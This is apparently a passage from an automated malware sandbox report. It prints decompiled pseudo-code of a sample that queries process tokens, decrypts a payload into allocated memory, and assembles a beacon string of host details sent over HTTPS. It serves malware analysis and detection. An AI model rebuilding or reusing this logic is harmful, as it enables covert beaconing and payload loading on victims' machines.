• Instruction Fuzzy Hash: 5E81F631E515A98BEF04CFB491603EDBFF6AF49340F990129D8C2AF2C5D77599468B80
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNELBASE(0000000E,0000AA01,00003000,00000004), ref: 736D6265
• CryptImportKey.ADVAPI32(?,00000208,0000002C,00000000,00000001,?), ref: 736D639B
• CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,0000AA00), ref: 736D63BD
• VirtualAlloc.KERNELBASE(00000000,0000AA00,00003000,00000004), ref: 736D63D2
Strings
Memory Dump Source
• Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: AllocCryptVirtual$DecryptImport
• String ID: $KERNEL32.dll
• API String ID: 4282381441-467793799
• Opcode ID: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
• Instruction ID: f0fa7c921dd1f86e776c8aa6a29a920ccb5ffd890efd8f7f25b12171d1663752
• Opcode Fuzzy Hash: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
• Instruction Fuzzy Hash: CE81D231E043588FDB01CFA8CA44BADBBB5FB59304F24829DD948AB286DB719945CB50
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                                                                                			E00A86307(char _a4, void* _a8) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                				char _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				void** _t33;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                				void** _t44;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				char _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v20 = _a4;
                                                                                                                                                                                                                                				_t48 = 0;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_a4 = 0;
                                                                                                                                                                                                                                				_v44 = 0x18;
                                                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				_v36 = 0;
                                                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                					_t33 =  &_v8;
                                                                                                                                                                                                                                					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                					if(_t33 >= 0) {
                                                                                                                                                                                                                                						_t47 = __imp__;
                                                                                                                                                                                                                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                						_t44 = E00A85157(_a4);
                                                                                                                                                                                                                                						if(_t44 != 0) {
                                                                                                                                                                                                                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                							if(_t40 >= 0) {
                                                                                                                                                                                                                                								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                								_t48 = 1;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							E00A853BB(_t44);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						NtClose(_v8); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					NtClose(_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t48;
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A8634E
                                                                                                                                                                                                                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00A86361
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A8637D
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A8639A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A863A7
                                                                                                                                                                                                                                • NtClose.NTDLL(?), ref: 00A863B9
                                                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 00A863C3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2575439697-0
                                                                                                                                                                                                                                • Opcode ID: 839d67cf58677a7bf76b97b4f69ce71d4fd09ca2530828599957b39a6116458d
                                                                                                                                                                                                                                • Instruction ID: 1a6623679a89dd777e5276e327cb1a2ece79f5ae1cf3af3d781285b8996af83d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 839d67cf58677a7bf76b97b4f69ce71d4fd09ca2530828599957b39a6116458d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F211672900218BBEB01EFA4CD89EDEBFBDEF08750F104126F901EA121D7719A459FA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 23%
                                                                                                                                                                                                                                			E00A87648(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				unsigned int _t37;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				intOrPtr* _t66;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t66 = __esi;
                                                                                                                                                                                                                                				_t63 = E00A83037(_t34, _a4);
                                                                                                                                                                                                                                				if(_t63 == 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					_t36 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t37 = GetVersion();
                                                                                                                                                                                                                                					_t69 = _t37 - 6;
                                                                                                                                                                                                                                					if(_t69 > 0) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						_a4 = 4;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t69 != 0) {
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							_a4 = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t37 = _t37 >> 8;
                                                                                                                                                                                                                                							if(_t37 > 2) {
                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__imp__(_t63, _a4, 0, 0, 0); // executed
                                                                                                                                                                                                                                					 *(_t66 + 0x10) = _t37;
                                                                                                                                                                                                                                					_t38 = E00A853BB(_t63);
                                                                                                                                                                                                                                					if( *(_t66 + 0x10) == 0) {
                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t39 = E00A83037(_t38,  *_t66);
                                                                                                                                                                                                                                						_v8 = _t39;
                                                                                                                                                                                                                                						if(_t39 == 0) {
                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t65 = __imp__; // 0x7021f5a0
                                                                                                                                                                                                                                							if(_a8 == 0) {
                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                                                                                                                                                                                                                                								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                                                                                                                                                                                                                                								_t40 = E00A853BB(_v8);
                                                                                                                                                                                                                                								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_a4 = 0x800100;
                                                                                                                                                                                                                                									_t56 = E00A83037(_t40,  *((intOrPtr*)(_t66 + 4)));
                                                                                                                                                                                                                                									if(_t56 == 0) {
                                                                                                                                                                                                                                										goto L18;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t42 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                										_t19 = _t42 + 0xa8e758; // 0x450047
                                                                                                                                                                                                                                										_t43 = _t19;
                                                                                                                                                                                                                                										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                                                                                                                                                                                                                                										E00A853BB(_t56);
                                                                                                                                                                                                                                										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                                                                                                										if(_t45 == 0) {
                                                                                                                                                                                                                                											goto L18;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t57 = 4;
                                                                                                                                                                                                                                											_v12 = _t57;
                                                                                                                                                                                                                                											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                                                                                                                                                                                                                                											if(_t45 != 0) {
                                                                                                                                                                                                                                												_a4 = _a4 | 0x00000100;
                                                                                                                                                                                                                                												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											_push(_t57);
                                                                                                                                                                                                                                											_push( &_a8);
                                                                                                                                                                                                                                											_push(6);
                                                                                                                                                                                                                                											_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                                                                                                                											if( *_t65() == 0) {
                                                                                                                                                                                                                                												goto L18;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												_push(_t57);
                                                                                                                                                                                                                                												_push( &_a8);
                                                                                                                                                                                                                                												_push(5);
                                                                                                                                                                                                                                												_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                                                                                                                												if( *_t65() == 0) {
                                                                                                                                                                                                                                													goto L18;
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													_t36 = 0;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L10;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t36;
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                0x00a8770e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a87710
                                                                                                                                                                                                                                0x00a87713
                                                                                                                                                                                                                                0x00a8771c
                                                                                                                                                                                                                                0x00a8771c
                                                                                                                                                                                                                                0x00a87726
                                                                                                                                                                                                                                0x00a8772d
                                                                                                                                                                                                                                0x00a87730
                                                                                                                                                                                                                                0x00a87735
                                                                                                                                                                                                                                0x00a8773a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8773c
                                                                                                                                                                                                                                0x00a8773e
                                                                                                                                                                                                                                0x00a8774a
                                                                                                                                                                                                                                0x00a8774d
                                                                                                                                                                                                                                0x00a87755
                                                                                                                                                                                                                                0x00a87757
                                                                                                                                                                                                                                0x00a87768
                                                                                                                                                                                                                                0x00a87768
                                                                                                                                                                                                                                0x00a8776a
                                                                                                                                                                                                                                0x00a8776e
                                                                                                                                                                                                                                0x00a8776f
                                                                                                                                                                                                                                0x00a87771
                                                                                                                                                                                                                                0x00a87778
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8777a
                                                                                                                                                                                                                                0x00a8777a
                                                                                                                                                                                                                                0x00a8777e
                                                                                                                                                                                                                                0x00a8777f
                                                                                                                                                                                                                                0x00a87781
                                                                                                                                                                                                                                0x00a87788
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8778a
                                                                                                                                                                                                                                0x00a8778a
                                                                                                                                                                                                                                0x00a8778a
                                                                                                                                                                                                                                0x00a87788
                                                                                                                                                                                                                                0x00a87778
                                                                                                                                                                                                                                0x00a8773a
                                                                                                                                                                                                                                0x00a8770e
                                                                                                                                                                                                                                0x00a876be
                                                                                                                                                                                                                                0x00a876c9
                                                                                                                                                                                                                                0x00a876cd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a876cd
                                                                                                                                                                                                                                0x00a876bc
                                                                                                                                                                                                                                0x00a876ad
                                                                                                                                                                                                                                0x00a8769b
                                                                                                                                                                                                                                0x00a87797

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
                                                                                                                                                                                                                                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A82E91,00000000,00000000,01AE9618,?,?,00A821A4,?,01AE9618,0000EA60), ref: 00A87663
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A82E91,00000000,00000000,01AE9618,?,?,00A821A4,?,01AE9618,0000EA60), ref: 00A8778E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 4097109750-1701360479
                                                                                                                                                                                                                                • Opcode ID: 6f8cbcf53ba2a5eb75d18d9d30ddecb643743c3dd8b13354b578fbc28a0280f9
                                                                                                                                                                                                                                • Instruction ID: 42391356ae5c7c20add91bc738206c64750e4a9fb2fd6e2d9d2bdc2738221fab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f8cbcf53ba2a5eb75d18d9d30ddecb643743c3dd8b13354b578fbc28a0280f9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B41B172500209FFEB20AFA4CD85EAE7BBDEB04784F204529F642950A1E7B1DA45CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,7614F7F0,00000000,761536A0), ref: 736D6C56
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: zdms
                                                                                                                                                                                                                                • API String ID: 4275171209-1934084468
                                                                                                                                                                                                                                • Opcode ID: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
                                                                                                                                                                                                                                • Instruction ID: 774b0289d904b06fdd56817648df59fe60c0c5a46fdbc45900e6772045a7fd53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75cb4285704739a957268dabf0def1296fa9bbba04dd1af3454ec59ddbaba9bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BD1B275A10A16CFCF11CF58C680BAAB7B6FF48314F6941A9D806AB3C6D370E951CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                                                			E00A8A565(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				intOrPtr _v4;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                				intOrPtr* _t56;
                                                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                				int _t77;
                                                                                                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                                                                                                				int _t81;
                                                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                                                				int _t86;
                                                                                                                                                                                                                                				intOrPtr* _t89;
                                                                                                                                                                                                                                				intOrPtr* _t90;
                                                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                                                				void* _t97;
                                                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                                                				int _t101;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                				void* _t105;
                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t95 = __edx;
                                                                                                                                                                                                                                				_t91 = __ecx;
                                                                                                                                                                                                                                				_t25 = __eax;
                                                                                                                                                                                                                                				_t105 = _a16;
                                                                                                                                                                                                                                				_v4 = 8;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t25 = GetTickCount();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t26 =  *0xa8d018; // 0x9ad51634
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t27 =  *0xa8d014; // 0x3a87c8cd
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t28 =  *0xa8d010; // 0xd8d2f808
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t29 =  *0xa8d00c; // 0x13d015ef
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t30 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                				_t3 = _t30 + 0xa8e633; // 0x74666f73
                                                                                                                                                                                                                                				_t101 = wsprintfA(_t105, _t3, 2, 0x3f878, _t29, _t28, _t27, _t26,  *0xa8d02c,  *0xa8d004, _t25);
                                                                                                                                                                                                                                				_t33 = E00A85C12();
                                                                                                                                                                                                                                				_t34 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                				_t4 = _t34 + 0xa8e673; // 0x74707526
                                                                                                                                                                                                                                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                                                                                                                				_t108 = _t106 + 0x38;
                                                                                                                                                                                                                                				_t102 = _t101 + _t37; // executed
                                                                                                                                                                                                                                				_t38 = E00A8508C(_t91); // executed
                                                                                                                                                                                                                                				_t96 = _t38;
                                                                                                                                                                                                                                				if(_t96 != 0) {
                                                                                                                                                                                                                                					_t83 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t6 = _t83 + 0xa8e8cc; // 0x736e6426
                                                                                                                                                                                                                                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t86;
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _t96);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t97 = E00A86706();
                                                                                                                                                                                                                                				if(_t97 != 0) {
                                                                                                                                                                                                                                					_t78 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t8 = _t78 + 0xa8e8d4; // 0x6f687726
                                                                                                                                                                                                                                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t81;
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _t97);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t98 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                				_a32 = E00A86DFA(0xa8d00a, _t98 + 4);
                                                                                                                                                                                                                                				_t42 =  *0xa8d308; // 0x0
                                                                                                                                                                                                                                				if(_t42 != 0) {
                                                                                                                                                                                                                                					_t74 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t11 = _t74 + 0xa8e8ae; // 0x3d736f26
                                                                                                                                                                                                                                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t77;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t43 =  *0xa8d304; // 0x0
                                                                                                                                                                                                                                				if(_t43 != 0) {
                                                                                                                                                                                                                                					_t71 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t13 = _t71 + 0xa8e885; // 0x3d706926
                                                                                                                                                                                                                                					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_a32 != 0) {
                                                                                                                                                                                                                                					_t46 = RtlAllocateHeap( *0xa8d270, 0, 0x800); // executed
                                                                                                                                                                                                                                					_t100 = _t46;
                                                                                                                                                                                                                                					if(_t100 != 0) {
                                                                                                                                                                                                                                						E00A8A425(GetTickCount());
                                                                                                                                                                                                                                						_t50 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                						__imp__(_t50 + 0x40);
                                                                                                                                                                                                                                						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                						_t54 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                						__imp__(_t54 + 0x40);
                                                                                                                                                                                                                                						_t56 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                						_t103 = E00A822AB(1, _t95, _t105,  *_t56);
                                                                                                                                                                                                                                						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                						if(_t103 != 0) {
                                                                                                                                                                                                                                							StrTrimA(_t103, 0xa8c2ac);
                                                                                                                                                                                                                                							_push(_t103);
                                                                                                                                                                                                                                							_t62 = E00A82629();
                                                                                                                                                                                                                                							_v16 = _t62;
                                                                                                                                                                                                                                							if(_t62 != 0) {
                                                                                                                                                                                                                                								_t89 = __imp__;
                                                                                                                                                                                                                                								 *_t89(_t103, _v0);
                                                                                                                                                                                                                                								 *_t89(_t100, _a4);
                                                                                                                                                                                                                                								_t90 = __imp__;
                                                                                                                                                                                                                                								 *_t90(_t100, _v28);
                                                                                                                                                                                                                                								 *_t90(_t100, _t103);
                                                                                                                                                                                                                                								_t68 = E00A82168(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                                                                                                                                                								_v52 = _t68;
                                                                                                                                                                                                                                								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                                                                                                                									E00A8651D();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								RtlFreeHeap( *0xa8d270, 0, _v44); // executed
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							HeapFree( *0xa8d270, 0, _t103);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						RtlFreeHeap( *0xa8d270, 0, _t100); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _a24);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				RtlFreeHeap( *0xa8d270, 0, _t105); // executed
                                                                                                                                                                                                                                				return _a4;
                                                                                                                                                                                                                                			}



















































                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A8A57C
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A5C9
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A5E6
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A609
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A619
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A63B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A64B
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A682
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A8A6A2
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A8A6BF
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A8A6CF
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A8A6E3
